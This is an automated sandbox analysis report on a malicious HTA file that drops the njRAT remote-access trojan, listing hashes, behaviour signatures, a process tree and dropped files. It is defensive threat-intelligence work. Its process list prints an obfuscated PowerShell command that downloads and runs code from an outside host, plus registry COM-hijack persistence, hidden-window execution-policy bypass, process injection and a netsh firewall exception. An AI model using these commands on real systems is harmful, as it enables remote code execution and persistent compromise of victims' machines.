Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 19:13
Static task
static1
Behavioral task
behavioral1
Sample
enc2.hta
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
enc2.hta
Resource
win10v2004-20220721-en
Behavioral task
behavioral3
Sample
enc3.hta
Resource
win7-20220718-en
Behavioral task
behavioral4
Sample
enc3.hta
Resource
win10v2004-20220721-en
General
-
Target
enc2.hta
-
Size
4KB
-
MD5
655efe95aac234dbfca94dda9b36db0e
-
SHA1
ab7a01b4048afe8a31348d48647fbbf2a0579e3f
-
SHA256
bb4c9c960b921042233d6835d513e320e353a616d44c089dc96a7f4b686e759b
-
SHA512
6928dd4d0201a3aec4e7d58da2d02e6a8bc4a3aa9e4b223e77f568ac094b752e5a18672124c1cc299870e6e81ce298d99017541f1d95cf64a229470dc998bd07
Malware Config
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWERSHELL.exePOWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4084 4848 POWERSHELL.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2312 4848 POWERSHELL.exe -
Blocklisted process makes network request 1 IoCs
Processes:
POWERSHELL.exeflow pid process 23 4084 POWERSHELL.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4920 set thread context of 3492 4920 powershell.exe aspnet_compiler.exe -
Modifies registry class 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exepid process 4084 POWERSHELL.exe 4084 POWERSHELL.exe 3580 powershell.exe 3580 powershell.exe 2312 POWERSHELL.exe 2312 POWERSHELL.exe 2312 POWERSHELL.exe 4920 powershell.exe 4920 powershell.exe 4920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 4084 POWERSHELL.exe Token: SeDebugPrivilege 3580 powershell.exe Token: SeDebugPrivilege 2312 POWERSHELL.exe Token: SeIncreaseQuotaPrivilege 3580 powershell.exe Token: SeSecurityPrivilege 3580 powershell.exe Token: SeTakeOwnershipPrivilege 3580 powershell.exe Token: SeLoadDriverPrivilege 3580 powershell.exe Token: SeSystemProfilePrivilege 3580 powershell.exe Token: SeSystemtimePrivilege 3580 powershell.exe Token: SeProfSingleProcessPrivilege 3580 powershell.exe Token: SeIncBasePriorityPrivilege 3580 powershell.exe Token: SeCreatePagefilePrivilege 3580 powershell.exe Token: SeBackupPrivilege 3580 powershell.exe Token: SeRestorePrivilege 3580 powershell.exe Token: SeShutdownPrivilege 3580 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe Token: SeSystemEnvironmentPrivilege 3580 powershell.exe Token: SeRemoteShutdownPrivilege 3580 powershell.exe Token: SeUndockPrivilege 3580 powershell.exe Token: SeManageVolumePrivilege 3580 powershell.exe Token: 33 3580 powershell.exe Token: 34 3580 powershell.exe Token: 35 3580 powershell.exe Token: 36 3580 powershell.exe Token: SeDebugPrivilege 4920 powershell.exe Token: SeIncreaseQuotaPrivilege 3580 powershell.exe Token: SeSecurityPrivilege 3580 powershell.exe Token: SeTakeOwnershipPrivilege 3580 powershell.exe Token: SeLoadDriverPrivilege 3580 powershell.exe Token: SeSystemProfilePrivilege 3580 powershell.exe Token: SeSystemtimePrivilege 3580 powershell.exe Token: SeProfSingleProcessPrivilege 3580 powershell.exe Token: SeIncBasePriorityPrivilege 3580 powershell.exe Token: SeCreatePagefilePrivilege 3580 powershell.exe Token: SeBackupPrivilege 3580 powershell.exe Token: SeRestorePrivilege 3580 powershell.exe Token: SeShutdownPrivilege 3580 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe Token: SeSystemEnvironmentPrivilege 3580 powershell.exe Token: SeRemoteShutdownPrivilege 3580 powershell.exe Token: SeUndockPrivilege 3580 powershell.exe Token: SeManageVolumePrivilege 3580 powershell.exe Token: 33 3580 powershell.exe Token: 34 3580 powershell.exe Token: 35 3580 powershell.exe Token: 36 3580 powershell.exe Token: SeIncreaseQuotaPrivilege 3580 powershell.exe Token: SeSecurityPrivilege 3580 powershell.exe Token: SeTakeOwnershipPrivilege 3580 powershell.exe Token: SeLoadDriverPrivilege 3580 powershell.exe Token: SeSystemProfilePrivilege 3580 powershell.exe Token: SeSystemtimePrivilege 3580 powershell.exe Token: SeProfSingleProcessPrivilege 3580 powershell.exe Token: SeIncBasePriorityPrivilege 3580 powershell.exe Token: SeCreatePagefilePrivilege 3580 powershell.exe Token: SeBackupPrivilege 3580 powershell.exe Token: SeRestorePrivilege 3580 powershell.exe Token: SeShutdownPrivilege 3580 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe Token: SeSystemEnvironmentPrivilege 3580 powershell.exe Token: SeRemoteShutdownPrivilege 3580 powershell.exe Token: SeUndockPrivilege 3580 powershell.exe Token: SeManageVolumePrivilege 3580 powershell.exe Token: 33 3580 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 4084 wrote to memory of 3580 4084 POWERSHELL.exe powershell.exe PID 4084 wrote to memory of 3580 4084 POWERSHELL.exe powershell.exe PID 3580 wrote to memory of 5032 3580 powershell.exe WScript.exe PID 3580 wrote to memory of 5032 3580 powershell.exe WScript.exe PID 2312 wrote to memory of 2528 2312 POWERSHELL.exe cmd.exe PID 2312 wrote to memory of 2528 2312 POWERSHELL.exe cmd.exe PID 2528 wrote to memory of 4232 2528 cmd.exe reg.exe PID 2528 wrote to memory of 4232 2528 cmd.exe reg.exe PID 2528 wrote to memory of 5000 2528 cmd.exe reg.exe PID 2528 wrote to memory of 5000 2528 cmd.exe reg.exe PID 2528 wrote to memory of 636 2528 cmd.exe cmd.exe PID 2528 wrote to memory of 636 2528 cmd.exe cmd.exe PID 636 wrote to memory of 4920 636 cmd.exe powershell.exe PID 636 wrote to memory of 4920 636 cmd.exe powershell.exe PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe PID 4920 wrote to memory of 3492 4920 powershell.exe aspnet_compiler.exe PID 3492 wrote to memory of 1988 3492 aspnet_compiler.exe netsh.exe PID 3492 wrote to memory of 1988 3492 aspnet_compiler.exe netsh.exe PID 3492 wrote to memory of 1988 3492 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HKXSZJPBSFUQNNKBRSHJOKP = '[$=^&7<[[=$0$]=)38}@{(4y$=^&7<[[=$0$]=)38}@{(4t{<1[36&1{3\}0_-\[[14<5*<=7#&\!{9^]&374-84*${.IO.$=^&7<[[=$0$]=)38}@{(4t324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-*<=7#&\!{9^]&374-84*${324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-d{<1[36&1{3\}0_-\[[14<5324)23*2469!/&^!\_0=)7]'.Replace('$=^&7<[[=$0$]=)38}@{(4','S').Replace('{<1[36&1{3\}0_-\[[14<5','E').Replace('324)23*2469!/&^!\_0=)7','R').Replace('&2#/!0/&-%5_]<-$4%%-<-','A').Replace('*<=7#&\!{9^]&374-84*${','M');$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');$HRIYRXVTBWQWWOVQDADEHPL = '[69_&(%*}8]8-%$74]$(#_]y69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}5<%_7<=7_#!{{$&]\%{/1)m.N5<%_7<=7_#!{{$&]\%{/1))-({\)@+/1405_2\8*427}.W5<%_7<=7_#!{{$&]\%{/1)bR5<%_7<=7_#!{{$&]\%{/1)qu5<%_7<=7_#!{{$&]\%{/1)69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}]'.Replace('69_&(%*}8]8-%$74]$(#_]','S').Replace('5<%_7<=7_#!{{$&]\%{/1)','E').Replace(')-({\)@+/1405_2\8*427}','T');$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');$HEPSSGXVTPJJSQLTBOWCTGE = '<[@63<_-53]5@$7[&63/^@r{(51(<04]=6-&01#378}1-a+810347\=@2(3-23#_%166{(51(<04]=6-&01#378}1-'.Replace('<[@63<_-53]5@$7[&63/^@','C').Replace('{(51(<04]=6-&01#378}1-','E').Replace('+810347\=@2(3-23#_%166','T');$HZAUFQYTLDKVFSGTXHYBUGZ = '/(\][54[=_@1]\<9\6\<<{+\88!1}*@<(&9#@692{]_@tR+\88!1}*@<(&9#@692{]_@82]534-04766\1_){4160#pon82]534-04766\1_){4160#+\88!1}*@<(&9#@692{]_@'.Replace('/(\][54[=_@1]\<9\6\<<{','G').Replace('+\88!1}*@<(&9#@692{]_@','E').Replace('82]534-04766\1_){4160#','S');$HRBPYOHOXEOEQFNKBXSNNCQ = 'G!4%@&_9+[%3[)^&%72#813t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@pon$@)(]=][6450_6!7\={3[@!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813am'.Replace('$@)(]=][6450_6!7\={3[@','S').Replace('!4%@&_9+[%3[)^&%72#813','E').Replace('1(!%9*60#7&21^5^67(%8_','R');$HXLAGAHHFUIJNGIUXVDWXPH = '8}*[+%^=_)@93]23#=&&3[!*%1!+]6_&}@@^]$[+}_*]a+-#8%3}]/+*#^1@+5{[%/[To!*%1!+]6_&}@@^]$[+}_*]n+-#8%3}]/+*#^1@+5{[%/['.Replace('8}*[+%^=_)@93]23#=&&3[','R').Replace('!*%1!+]6_&}@@^]$[+}_*]','E').Replace('+-#8%3}]/+*#^1@+5{[%/[','D');&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE('https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ()).$HXLAGAHHFUIJNGIUXVDWXPH())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.batFilesize
706B
MD56a90128893777a59d404d46d3e967104
SHA1e2b70c13764f2f61aa8503999670542237046bc4
SHA256b986b6412802dadf97cc3684372614c084a723c25ad5db606c59a7445914b319
SHA5125e8ed2c486b6e0832fb1516d27a63e531355c61155259438f5d2ab220e0545786a76f3633499d721b94d5857e2d0ce2c04b6ae8918bc316ed639b926fdfa794c
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1Filesize
3KB
MD543864d67842266f76a91dc4aee7338c7
SHA1022259ecb6970f6790c329e36b94402ba815b5e0
SHA256c9aee12c943156b698c5f5413fb0a6bbca87d0dec227d972e59dc974ac39decf
SHA51232bb0b67d9ec8064b13a2db93940ed41ce8bc352364a0222dcef7fc6bef98b7c3a579f608fb3cb5d6b81db49a58b736600831f5c40651e058a635f7502d55980
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbsFilesize
1KB
MD5d6a5f499f7164e0d61a5b8a0b4900fba
SHA1054352e97c7aa7cf0eb3b0cf2ded905fc22a70b9
SHA2565b5e07e5a147d23983fe0adb7fed1c95f76ffe9443bd1394d4a8248a80ad2e44
SHA5122129eb026a406fc52057f1efb9c81e1e8696971ff738093671e1c794c4cb77022bcb8b980c4fc7b1705451e9b86d2cdec87ad35b198d002035cf95dc904ebec2
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58e42bec1f8f4c3705f1df36c21c85531
SHA1c9d6aac3c1b16ed12f22185ebdc9f921cd396d14
SHA256f3a91001711172cac5380d0409a531f64a8f85666188abb1e4fd0af070ddb9e2
SHA512d8b5b5ad81d6d447a3e1994e3ffb8c75f91452599737bc40b5c0b11668300654b938e92f87718c3f01a70cad26b54f697eb6f70fe95c2dd2357ccd4b8bd24aa6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f87b0558f50792e4684d92fb3d271c24
SHA1e745842dfeec7403c04a660ad6a2f2231ba605bb
SHA25661d84320415c97ff5d41de5030ba8b8b77c04295d2137f95de9e947a954a8192
SHA51256275978bc50ff36bd9ace519adc25d204955983ba0394ced54f9a70d063c4445e591df6e697b536a1abce8cd4795b80e572f17ae31063c97926cff4553d51a2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
memory/636-142-0x0000000000000000-mapping.dmp
-
memory/1988-160-0x0000000000000000-mapping.dmp
-
memory/2312-145-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/2312-156-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/2528-138-0x0000000000000000-mapping.dmp
-
memory/3492-161-0x0000000005F60000-0x0000000005FC6000-memory.dmpFilesize
408KB
-
memory/3492-158-0x00000000059B0000-0x0000000005F54000-memory.dmpFilesize
5.6MB
-
memory/3492-157-0x00000000052E0000-0x000000000537C000-memory.dmpFilesize
624KB
-
memory/3492-162-0x0000000006510000-0x000000000651A000-memory.dmpFilesize
40KB
-
memory/3492-159-0x0000000005400000-0x0000000005492000-memory.dmpFilesize
584KB
-
memory/3492-151-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3492-152-0x000000000040BBBE-mapping.dmp
-
memory/3580-134-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/3580-147-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/3580-133-0x0000000000000000-mapping.dmp
-
memory/4084-130-0x000002D5B9CA0000-0x000002D5B9CC2000-memory.dmpFilesize
136KB
-
memory/4084-150-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4084-131-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4084-132-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4232-140-0x0000000000000000-mapping.dmp
-
memory/4920-146-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4920-154-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4920-143-0x0000000000000000-mapping.dmp
-
memory/5000-141-0x0000000000000000-mapping.dmp
-
memory/5032-136-0x0000000000000000-mapping.dmp